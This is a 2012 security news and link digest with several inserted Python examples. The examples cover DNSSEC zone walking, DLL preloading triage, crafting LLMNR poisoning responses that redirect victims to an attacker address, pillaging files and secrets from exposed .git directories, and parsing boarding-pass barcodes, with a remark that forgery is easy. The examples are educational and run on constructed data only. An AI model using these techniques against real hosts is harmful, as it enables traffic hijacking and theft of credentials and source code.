Week 43 in Review – 2012

Event Related

  • ToorCon
    • ToorChat – github.com
      A Chat Program for use with the ToorCon 2013 badge.
    • ToorCon Presentation – brightmoonsecurity.com
      Thanks for attending my Toorcon Presentation. Below are links to my presentation and the references I mentioned in the talk. Please let me know if you have any recommendations on course materials.
    • ToorCon Presentation – ciphersuites.com
      This is the landing page for the research done by tecknicaltom for the ToorCon presentation by tecknicaltom titled HTTPS in the Real World: Screw-ups, Trends, and Outliers.
  • Hack.lu 2012
    • Hack.lu 2012 Wrap-Up Day #1 – blog.rootshell.be
      Last week, I was in Luxembourg for my day-to-day job and this week, I’m back for more fun (and some business too). It’s time for a new edition of hack.lu. This is already my fourth edition, time flies!
    • Hack.lu 2012 Wrap-Up Day #2 – blog.rootshell.be
      Here we go for the wrap-up of the second day! After a short night and some 0xC0FFEE, the schedule started with a keynote by Sharon Conheady about the “future of social engineering“. Sharon is a specialist in social extreme engineering (read: with physical access to facilities).
    • Hack.lu 2012 Wrap-Up Day #3 – blog.rootshell.be
      The 2012 edition of hack.lu is already over for a few minutes. Here is my wrap-up posted just before driving back to $HOME! Yesterday, we had a nice dinner with Belgian friends.
  • RuxCon Breakpoint
    • RuxCon Breakpoint Slides – ruxconbreakpoint.com
      Check out the presentation of each speaker for the RuxCon Breakpoint.
    • RuxCon Slides – ruxcon.org.au
      Check out the presentation of each speaker for the RuxCon.
  • SkyDogCon 2012 Videos – irongeek.com
    Here are the videos from SkyDogCon. Thanks to all of the SkyDogCon crew, especially SeeBlind for running the cameras.

Resources

Techniques

  • Introducing the USB Stick of Death – j00ru.vexillium.org
    Several months back we have been playing with different file systems on various system platforms, examining the security posture and robustness of numerous device drivers’ implementations.
  • AXFR for DNSSEC: DNSSEC Walker – room362.com
    DNSSEC Walker traverses a domain’s DNSSEC records to locate its regular DNS records.
  • Testing Applications for DLL Preloading Vulnerabilities – netspi.com
    DLL preloading (also known as sideloading and/or hijacking) is a common vulnerability in applications. The exploitation of the vulnerability is a simple file write (or overwrite) and then you have an executable running under the context of the application.
  • Hacking KeyLoggers – blog.opensecurityresearch.com
    Our forensics investigations often result in us having to identify odd devices left over by attackers. So when we recently had to investigate a suspicious USB device connected between the keyboard and USB port on the rear chassis of a senior executive’s desktop computer, my job (I chose to accept it) was to discover what the device was and if it was evil.
  • Demystifying Dot NET Reverse Engineering, Part 1: Big Introduction – resources.infosecinstitute.com
    This, and all upcoming parts, are made with a strict and pure educational purpose just to gain insights into dot NET programs. What you’re going to do with this and all upcoming parts is your own responsibility. I will not be held responsible for your eventual action and use of this.
  • Hacking PDF: util.printf() Buffer Overflow: Part 1 – resources.infosecinstitute.com
    One of the first things we need to do is to remove the PDF Reader we currently have installed and reinstall the old version of PDF Reader.
  • Strategies to Mitigate Targeted Cyber Intrusions – dsd.gov.au
    Australian computer networks are being targeted by adversaries seeking access to sensitive information.
  • Fuzzing the Iceberg: Finding Vulnerabilities in Third Party Software – securetheinterior.blogspot.de
    Since 2005, the number of vulnerabilities revealed annually has been generally consistent, between 7,000 and 9,000 [1].
  • Creating an Offline-Version of O2 – diniscruz.blogspot.com
    If you are going to use O2 in a location without a good network connection or if you have some corporate proxy that prevents the download of some of O2 external dependencies (that happen on first use/compile of some O2 Scripts), the best thing to do is to create an Offline Copy of O2.
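The DNSSEC Walker item above rests on one property of NSEC: every signed name carries a record naming the next name in the zone, so following that chain from the apex until it wraps around enumerates the zone. The block below is an added example, not DNSSEC Walker’s own code: it parses NSEC RDATA as defined in RFC 4034 section 4.1 (next owner name plus a type bitmap) and walks a zone that is constructed inline to stand in for live queries. Only window 0 of the bitmap is built here; the parser handles any window.

```python
# Added example (not DNSSEC Walker's own code): enumerate a DNSSEC-signed zone
# by walking its NSEC chain. The "zone" below is constructed inline and stands
# in for live DNS queries; in practice each lookup is a query for the NSEC
# RRset at that name, and the RDATA is parsed exactly as parse_nsec_rdata does.

TYPE_NUM = {"A": 1, "NS": 2, "SOA": 6, "MX": 15, "AAAA": 28, "DS": 43,
            "RRSIG": 46, "NSEC": 47, "DNSKEY": 48}
NUM_TYPE = {v: k for k, v in TYPE_NUM.items()}
DNSSEC_TYPES = {"RRSIG", "NSEC", "NSEC3", "DNSKEY", "DS"}


def encode_name(name):
    """Wire-format a dotted name as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(buf, off=0):
    """Read a wire-format name (NSEC RDATA never uses compression pointers)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels) + ".", off


def build_nsec_rdata(next_name, types):
    """NSEC RDATA: next owner name followed by a type bitmap (window 0 only here)."""
    nums = sorted(TYPE_NUM[t] for t in types)
    bitmap = bytearray(max(nums) // 8 + 1)
    for n in nums:
        bitmap[n // 8] |= 0x80 >> (n % 8)      # bit 0 of each byte is the MSB
    return encode_name(next_name) + bytes([0, len(bitmap)]) + bytes(bitmap)


def parse_nsec_rdata(rdata):
    """Return (next_name, set of type mnemonics) from NSEC RDATA."""
    next_name, off = decode_name(rdata)
    types = set()
    while off < len(rdata):
        window, length = rdata[off], rdata[off + 1]
        off += 2
        for i, byte in enumerate(rdata[off:off + length]):
            for bit in range(8):
                if byte & (0x80 >> bit):
                    t = window * 256 + i * 8 + bit
                    types.add(NUM_TYPE.get(t, "TYPE%d" % t))
        off += length
    return next_name, types


# Constructed zone: owner name -> NSEC RDATA bytes. The last record points
# back to the apex, which is how a walker knows it has seen the whole zone.
CONSTRUCTED_ZONE = {
    "example.test.": build_nsec_rdata("ftp.example.test.", {"NS", "SOA", "RRSIG", "NSEC", "DNSKEY"}),
    "ftp.example.test.": build_nsec_rdata("mail.example.test.", {"A", "RRSIG", "NSEC"}),
    "mail.example.test.": build_nsec_rdata("www.example.test.", {"A", "MX", "RRSIG", "NSEC"}),
    "www.example.test.": build_nsec_rdata("example.test.", {"A", "AAAA", "RRSIG", "NSEC"}),
}


def lookup_nsec(name, zone=CONSTRUCTED_ZONE):
    """Stand-in for a live NSEC query; returns RDATA bytes or None."""
    return zone.get(name.lower())


def walk_zone(apex, lookup=lookup_nsec, max_steps=100000):
    """Follow the NSEC chain from the apex until it wraps around.
    Returns [(owner, sorted types)], or whatever was collected before a broken
    chain (unsigned zone, or NSEC3 instead of NSEC) or a loop stopped the walk."""
    found, visited, name = [], set(), apex
    for _ in range(max_steps):
        rdata = lookup(name)
        if rdata is None:
            break
        next_name, types = parse_nsec_rdata(rdata)
        found.append((name, sorted(types)))
        visited.add(name)
        if next_name == apex or next_name in visited:
            break
        name = next_name
    return found


def regular_records(apex, lookup=lookup_nsec):
    """The non-DNSSEC record types at every name, i.e. what the walker is after."""
    return {owner: [t for t in types if t not in DNSSEC_TYPES]
            for owner, types in walk_zone(apex, lookup)}
```

A zone that answers with NSEC3 instead of NSEC yields no chain to follow (the walk stops at the apex), which is exactly why NSEC3 was introduced.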
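The DLL preloading item above describes the whole bug in one sentence: the application asks the loader for a DLL, the loader misses in a directory an attacker can write to, and a file planted there runs as the application. The usual way to find those misses is a Process Monitor capture filtered on CreateFile, NAME NOT FOUND and a .dll path. The block below is an added example, not NetSPI’s code: it triages a ProcMon CSV export for such misses and flags the ones in writable directories. The CSV rows and the writable-directory list are constructed for the example; on a real assessment the ACL check replaces `is_writable()`.

```python
# Added example (not NetSPI's code): triage a Process Monitor CSV export for
# DLL preloading candidates. The CSV lines and the writable-directory list are
# constructed for this example; on a real test you export ProcMon's capture
# to CSV and replace is_writable() with an ACL check (icacls / os.access).
import csv
import io
import ntpath

CONSTRUCTED_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1234567 AM","app.exe","4120","CreateFile","C:\Program Files\App\dwmapi.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.1234600 AM","app.exe","4120","CreateFile","C:\Windows\System32\dwmapi.dll","SUCCESS","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.1235000 AM","app.exe","4120","CreateFile","C:\Users\Public\Tools\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.1235100 AM","app.exe","4120","CreateFile","C:\Program Files\App\config.xml","NAME NOT FOUND","Desired Access: Generic Read, Disposition: Open"
"10:01:02.1235200 AM","app.exe","4120","CreateFile","C:\Users\Public\Tools\helper.dll","NAME NOT FOUND","Desired Access: Generic Read, Disposition: Open"
"10:01:02.1235300 AM","svchost.exe","880","RegQueryValue","HKLM\SOFTWARE\Foo","NAME NOT FOUND","Length: 144"
'''

# Stand-in for a real ACL check: directories an unprivileged user can write to.
CONSTRUCTED_WRITABLE_DIRS = {r"C:\Users\Public\Tools", r"C:\Temp"}


def is_writable(directory, writable=CONSTRUCTED_WRITABLE_DIRS):
    """Offline stand-in; on Windows use icacls or os.access(directory, os.W_OK)."""
    return directory.rstrip("\\").lower() in {d.lower() for d in writable}


def find_preload_candidates(csv_text, writable=CONSTRUCTED_WRITABLE_DIRS):
    """Every .dll the process looked for and did not find, keyed by full path.
    A miss means the loader kept searching the DLL search order, so a file
    planted at that path would be picked up before the real library."""
    candidates = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue
        directory, dll = ntpath.split(path)
        entry = candidates.setdefault(path, {
            "process": row["Process Name"], "pid": row["PID"], "dll": dll,
            "directory": directory, "writable": is_writable(directory, writable),
            "hits": 0,
        })
        entry["hits"] += 1
    return candidates


def exploitable_paths(csv_text, writable=CONSTRUCTED_WRITABLE_DIRS):
    """Candidates whose directory a low-privileged user can write to: these are
    the ones where a simple file write gives code execution as the process."""
    return sorted(path for path, e in find_preload_candidates(csv_text, writable).items()
                  if e["writable"])


if __name__ == "__main__":
    for path, e in find_preload_candidates(CONSTRUCTED_PROCMON_CSV).items():
        print("%s (pid %s) missed %s  writable=%s hits=%d"
              % (e["process"], e["pid"], path, e["writable"], e["hits"]))
```

The miss in `C:\Program Files\App` is worth recording even though that directory is normally not writable: it is still a preloading bug, and installers that relax the ACL on their own directory turn it into the exploitable kind.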

Tools

  • TrueCrypt Head
    • TCHead – TrueCrypt Password Cracking Tool – toolsyard.thehackernews.com
      TCHead is software that decrypts and verifies TrueCrypt headers. TCHead supports all the current hashes, individual ciphers, standard volume headers, hidden volume headers and system drive encrypted headers (preboot authentication).
    • Attacking TrueCrypt – h-online.com
      The open source TrueCrypt disk encryption tool is considered to be the software of choice for systematically encrypting data. It is able to encrypt individual drives, such as USB Flash drives, and even entire hard drives. A small utility called TCHead is, however, able to tackle data encrypted using TrueCrypt.
  • Atlasutils Release – atlas.r4780y.com
    Latest atlasutils downloadable here.
  • Introducing Responder-1.0 – blog.spiderlabs.com
    Responder is a multi threaded tool that answers to IPv4 LLMNR (Link-local Multicast Name Resolution) and Netbios Name Service (NBT-NS) queries.
  • DVCS-Pillage – github.com
    I thought it would be useful to automate some other techniques I found to extract code, configs and other information from git, hg, and bzr repos identified in a web root that was not 100% cloneable. Each script extracts as much knowledge about the repo as possible through predictable file names and known object hashes, etc.
  • Updates to CERT Fuzzing Tools (BFF 2.6 & FOE 2.0.1) – cert.org
    In the past, our two fuzzing frameworks had been based on related code but developed separately. Beginning with the release of BFF 2.5 in April and FOE 2.0 in July, we began to converge these code bases back together.
  • IDAscope a great SwissKnife for reversers – marcoramilli.blogspot.com
    Today I’d like to introduce a great tool made by Daniel Plohmann and Alexander Hanel from University of Bonn and Fraunhofer FKIE called IDAscope. IDAscope is an IDAPro extension for easier (malware) reverse engineering: it offers three main functionalities.
  • Kautilya 0.4.0 – reliable payload execution and more – labofapenetrationtester.blogspot.com
    Kautilya 0.4.0 would be more reliable than ever (at least I intended so). There has been a major change in the architecture thanks to this awesome post by the Offensive Security guys. Large parts of code have been copied from the Peensy standalone.
  • NOWASP (Mutillidae) – sourceforge.net
    NOWASP (Mutillidae) is a free, open source web application provided to allow security enthusiasts to pen-test a web application.
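The Responder item above names the two protocols it poisons but not what the exchange looks like. The block below is an added example, not Responder’s code: it builds the LLMNR query a Windows host multicasts when it cannot resolve a single-label name, parses it, and crafts the spoofed answer that sends the victim to the attacker (same transaction ID, same question, QR bit set, one A record), plus the NBT-NS name encoding needed to read those queries. Names, transaction ID and attacker address are constructed; nothing is sent on the wire (LLMNR is UDP to 224.0.0.252:5355, RFC 4795; NBT-NS is broadcast UDP 137).

```python
# Added example (not Responder's code): the LLMNR exchange that Responder
# poisons, built and parsed by hand. Everything here is constructed inline
# (query name, transaction ID, attacker address); no packets are sent.
import struct
import ipaddress

QR = 0x8000      # header flag: message is a response
QTYPE_A = 1
CLASS_IN = 1


def encode_name(name):
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(buf, off):
    labels = []
    while buf[off] != 0:
        n = buf[off]
        labels.append(buf[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off + 1


def build_llmnr_query(name, txid=0x1234, qtype=QTYPE_A):
    """What a Windows host emits when it cannot resolve a single-label name."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def parse_llmnr_query(pkt):
    """Return the question, or None if this is not a single-question query."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & QR or qdcount != 1:
        return None
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": pkt[12:off + 4]}


def build_llmnr_poison(query_pkt, attacker_ip, ttl=30):
    """Answer any A query for the asked name with the attacker's address:
    same transaction ID and question, QR set, one answer record."""
    q = parse_llmnr_query(query_pkt)
    if q is None or q["qtype"] != QTYPE_A or q["qclass"] != CLASS_IN:
        return None
    header = struct.pack("!HHHHHH", q["txid"], QR, 1, 1, 0, 0)
    answer = (encode_name(q["name"])
              + struct.pack("!HHIH", QTYPE_A, CLASS_IN, ttl, 4)
              + ipaddress.IPv4Address(attacker_ip).packed)
    return header + q["question"] + answer


def parse_llmnr_answer(pkt):
    """(name, dotted IP) from a one-answer response; this is what the victim acts on."""
    _txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & QR or ancount < 1:
        return None
    off = 12
    for _ in range(qdcount):          # skip the echoed question section
        _, off = decode_name(pkt, off)
        off += 4
    name, off = decode_name(pkt, off)
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    if rtype != QTYPE_A or rdlen != 4:
        return None
    return name, str(ipaddress.IPv4Address(pkt[off:off + 4]))


# NBT-NS carries the name in "first-level encoding": each nibble + 'A', so the
# 16 bytes (15 name chars padded with spaces + a suffix byte) become 32 chars.
def encode_nbns_name(name, suffix=0x20):
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return bytes([32]) + enc + b"\x00"


def decode_nbns_name(buf, off=0):
    length = buf[off]
    enc = buf[off + 1:off + 1 + length]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, length, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15], off + 1 + length + 1
```

The victim accepts the first answer carrying its transaction ID, which is why Responder can win simply by being on the segment; the defensive counterpart is to disable LLMNR and NetBIOS over TCP/IP via group policy so the queries are never sent.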
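The DVCS-Pillage item above relies on two facts about an exposed `.git` directory: its files have predictable names (`HEAD`, `refs/heads/master`), and every object lives at `objects/<first two hex>/<rest>` under its own SHA-1, so knowing one hash lets you fetch the object and learn the hashes of everything it references. The block below is an added example, not the DVCS-Pillage scripts: it builds a tiny repository inline (constructed objects, no git binary), then recovers every file by following HEAD to the commit, the commit to its tree, and the tree to its blobs. The local file reader stands in for the HTTP GETs a real pillage does against the web root.

```python
# Added example (not DVCS-Pillage's code): recover files from a .git directory
# one object at a time, the way a pillage against an exposed web root works.
# The repository is constructed inline; fetch() reads local files where the
# real tool would GET https://target/.git/<relpath>.
import hashlib
import os
import tempfile
import zlib


def git_hash_object(kind, data):
    """Git's loose-object format: '<type> <size>\\0<data>', zlib-compressed, named by SHA-1."""
    raw = "%s %d\0" % (kind, len(data))
    raw = raw.encode() + data
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def write_object(gitdir, kind, data):
    sha, blob = git_hash_object(kind, data)
    path = os.path.join(gitdir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(blob)
    return sha


def tree_entry(mode, name, sha):
    """One tree entry: '<mode> <name>\\0' followed by the 20 raw SHA-1 bytes."""
    return ("%s %s\0" % (mode, name)).encode() + bytes.fromhex(sha)


def make_constructed_repo():
    """A two-file repository with a secret in config/.env (all values made up)."""
    gitdir = os.path.join(tempfile.mkdtemp(), ".git")
    env = write_object(gitdir, "blob", b"DB_PASSWORD=hunter2\n")
    php = write_object(gitdir, "blob", b"<?php echo 'hi'; ?>\n")
    sub = write_object(gitdir, "tree", tree_entry("100644", ".env", env))
    top = write_object(gitdir, "tree",
                       tree_entry("40000", "config", sub) + tree_entry("100644", "index.php", php))
    commit = write_object(gitdir, "commit",
                          ("tree %s\nauthor a <a@b> 0 +0000\ncommitter a <a@b> 0 +0000\n\ninitial\n" % top).encode())
    os.makedirs(os.path.join(gitdir, "refs", "heads"), exist_ok=True)
    with open(os.path.join(gitdir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    with open(os.path.join(gitdir, "refs", "heads", "master"), "w") as f:
        f.write(commit + "\n")
    return gitdir


def local_fetcher(gitdir):
    """Stand-in for HTTP: return the bytes at .git/<relpath>, or None if absent (404)."""
    def fetch(relpath):
        try:
            with open(os.path.join(gitdir, *relpath.split("/")), "rb") as f:
                return f.read()
        except FileNotFoundError:
            return None
    return fetch


def read_object(fetch, sha):
    """Fetch, inflate and verify one loose object; returns (type, body) or None."""
    blob = fetch("objects/%s/%s" % (sha[:2], sha[2:]))
    if blob is None:
        return None
    raw = zlib.decompress(blob)
    if hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError("object %s does not match its hash" % sha)
    header, _, body = raw.partition(b"\0")
    kind, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError("bad object size")
    return kind, body


def parse_tree(body):
    entries, off = [], 0
    while off < len(body):
        sp = body.index(b" ", off)
        nul = body.index(b"\0", sp)
        entries.append((body[off:sp].decode(), body[sp + 1:nul].decode(),
                        body[nul + 1:nul + 21].hex()))
        off = nul + 21
    return entries


def head_commit(fetch):
    """HEAD is either a symbolic ref to fetch next or a bare commit hash."""
    head = fetch("HEAD").decode().strip()
    return fetch(head[5:]).decode().strip() if head.startswith("ref: ") else head


def pillage(fetch):
    """Every file reachable from HEAD, as {path: bytes}."""
    kind, body = read_object(fetch, head_commit(fetch))
    if kind != "commit":
        raise ValueError("HEAD does not point at a commit")
    tree_sha = body.split(b"\n", 1)[0].split(b" ")[1].decode()
    files = {}

    def walk(sha, prefix):
        for mode, name, esha in parse_tree(read_object(fetch, sha)[1]):
            if mode == "40000":
                walk(esha, prefix + name + "/")
            else:
                files[prefix + name] = read_object(fetch, esha)[1]

    walk(tree_sha, "")
    return files
```

Objects that have been packed (`objects/pack/*.pack`) are not reachable this way; that is the "not 100% cloneable" case where the DVCS-Pillage scripts fall back to other predictable files such as `index` and `packed-refs`.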

Vendor/Software Patches

  • [SE-2012-01] Challenging Oracle (in a different way) – seclists.org
    On Oct 16, 2012, Oracle Corporation released Java SE Critical Patch Update [1], which incorporated fixes for 19 security issues that we reported to the company earlier this year. This included a fix for a serious Issue 32 [2] found shortly after the out-of-band patch was released by Oracle on Aug 30, 2012.

Vulnerabilities

  • Security Flaws in the TSA Pre-check System and the Boarding Pass Check System – puckinflight.wordpress.com
    The problem is, the passenger and flight information encoded in the barcode is not encrypted in any way. Using a web site I decoded my boarding pass for my upcoming trip.
  • Broadcom DoS on BCM4325 and BCM4329 devices – coresecurity.com
    This vulnerability was discovered by Andres Blanco. The Proof of Concept and additional research was made by Andres Blanco and Matias Eissler from Core Impact team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.
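The boarding pass item above says the barcode is not encrypted; concretely, the PDF417 or Aztec symbol holds an IATA Bar Coded Boarding Pass (BCBP) string, a fixed-width ASCII record anyone with a barcode reader can parse. The block below is an added example, not code from the linked post: it decodes the mandatory part of a BCBP string using the standard field widths. The boarding pass itself is constructed with made-up passenger, booking and flight values, and the parser deliberately does not claim to locate any screening indicator, which lives in the conditional section the linked post discusses.

```python
# Added example (not from the linked post): decode the fixed part of an IATA
# Bar Coded Boarding Pass (BCBP) string, the data inside the barcode. The pass
# below is constructed with made-up values; the widths are the BCBP mandatory
# items. Nothing is encrypted or encoded beyond fixed-width ASCII.
from datetime import date, timedelta

BCBP_MANDATORY = [            # (field, width) in on-the-wire order, 60 chars total
    ("format_code", 1),       # "M"
    ("legs", 1),              # number of flight legs encoded
    ("passenger_name", 20),   # SURNAME/FIRSTNAME, space padded
    ("eticket", 1),           # "E" for electronic ticket
    ("pnr", 7),               # booking reference
    ("from_airport", 3),
    ("to_airport", 3),
    ("carrier", 3),
    ("flight", 5),
    ("julian_date", 3),       # day of year, no year
    ("compartment", 1),       # cabin class code
    ("seat", 4),
    ("checkin_seq", 5),
    ("passenger_status", 1),
    ("cond_size", 2),         # hex length of the conditional section that follows
]


def parse_bcbp(data):
    """Split a BCBP string into its mandatory fields plus the raw conditional section."""
    if not data.startswith("M"):
        raise ValueError("not a BCBP 'M' format barcode")
    fields, off = {}, 0
    for name, width in BCBP_MANDATORY:
        fields[name] = data[off:off + width].strip()
        off += width
    cond_len = int(fields["cond_size"] or "0", 16)
    fields["conditional"] = data[off:off + cond_len]
    return fields


def flight_date(fields, year):
    """BCBP only carries the day of year; the year has to come from context."""
    return date(year, 1, 1) + timedelta(days=int(fields["julian_date"]) - 1)


# Constructed boarding pass (made-up passenger, PNR and flight), assembled from
# fixed-width pieces so the widths above are visible.
CONSTRUCTED_PASS = (
    "M" + "1" + "DOE/JANE".ljust(20) + "E" + "XYZ789".ljust(7)
    + "SFO" + "JFK" + "AA".ljust(3) + "0100".ljust(5) + "300"
    + "Y" + "012C" + "0042".ljust(5) + "1" + "00"
)

if __name__ == "__main__":
    for k, v in parse_bcbp(CONSTRUCTED_PASS).items():
        print("%-17s %r" % (k, v))
```

Because there is no integrity protection either, the same layout that makes the pass readable makes it writable: a forged pass is just another 60-character string.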

Other News

  • Research Shows Serious Problems With Android App SSL Implementations – threatpost.com
    There are thousands of apps in the Google Play mobile market that contain serious mistakes in the way that SSL/TLS is implemented, leaving them vulnerable to man-in-the-middle attacks that could compromise sensitive user data such as banking credentials, credit card numbers and other information.
  • Spam with .gov URLs – symantec.com
    Traditionally, .gov URLs have been restricted to government entities. This brings up the question of how spammers are using .gov URLs in spam messages.
  • Researchers find not all EC2 instances are created equal – theregister.co.uk
    Researchers from Deutsche Telekom Laboratories and Finland’s Aalto University have claimed it is possible to detect the CPUs of servers powering Amazon Web Services’ (AWS’) Elastic Compute Cloud (EC2), and that the fact the cloudy giant uses different kit in different places means users can select more powerful servers at the same cost charged for lesser hardware.
  • Researchers Find Flaws In Android Apps That Leave Millions Vulnerable To Password, Online Banking Credentials, And Email Data Theft – forbes.com
    Android apps that have been downloaded by as many as 185 million users have been found to contain vulnerabilities that can expose passwords, emails, and even online banking credentials.
  • Hackers steal customer data from Barnes & Noble keypads – news.cnet.com
    Hackers broke into keypads at more than 60 Barnes & Noble bookstores and made off with the credit card information for customers who shopped at the stores as recently as last month.
  • How a Google Headhunter’s E-Mail Unraveled a Massive Net Security Hole – wired.com
    It was a strange e-mail, coming from a job recruiter at Google, asking Zachary Harris if he was interested in a position as a site-reliability engineer.
  • Sony faces setback as hackers release PlayStation 3 decryption keys – arstechnica.com
    Sony faced a setback in its campaign to control what software can run on its PlayStation 3 after hackers published one of the cryptographic keys that forms the core of the security scheme locking down the game console.
  • Jailbreaking now legal under DMCA for smartphones, but not tablets – arstechnica.com
    The Digital Millennium Copyright Act makes it illegal to “circumvent” digital rights management schemes. But when Congress passed the DMCA in 1998, it gave the Librarian of Congress the power to grant exemptions. The latest batch of exemptions, which will be in force for three years, were announced on Thursday.
  • Leading Tech Companies Form Cyber Security Research Alliance – xbitlabs.com
    Advanced Micro Devices, Honeywell, Intel Corp., Lockheed Martin and RSA/EMC announced the creation of the Cyber Security Research Alliance (CSRA), a private, non-profit research consortium formed in response to the growing need for increased public-private collaboration to address complex problems in cyber security.
  • New Project Basecamp Tools for CoDeSys, 200+ Vendors Affected – digitalbond.com
    Reid Wightman provided one last set of Project Basecamp tools before leaving for ioActive. This latest release is two tools for PLCs running the CoDeSys ladder logic runtime, which has a list of 261 vendors.
  • DHS realigns cyber office into five divisions – federalnewsradio.com
    The Homeland Security Department’s Office of Cybersecurity and Communications is expanding to five divisions from three and creating a performance-management office.
  • How do penetration testers work in teams? – reddit.com
    Like the title says, how do you put the “team” in penetration testing team? What different roles/tasks can different testers do to cooperate in a pentest? What are the benefits to having more people besides simply having a broader skill-set on hand? Hollywood always shows one guy in the van, another at the switchboard in the basement, one in the elevator shaft, and the two most attractive people doing SE on the main floor. How’s it work in real life?
  • South Carolina reveals massive data breach of Social Security Numbers, credit cards – computerworld.com
    Approximately 3.6 million Social Security numbers and 387,000 credit and debit card numbers belonging to South Carolina taxpayers were exposed after a server at the state’s Department of Revenue was breached by an international hacker, state officials said Friday.
  • Cash-Strapped States Under Siege – darkreading.com
    Most state chief information security officers say that a lack of funding is the biggest challenge in their cybersecurity efforts, and 70 percent of state CISOs have reported a data breach this year.
October 29th, 2012 | Security Conferences, Security Tools, Security Vulnerabilities, Week in Review
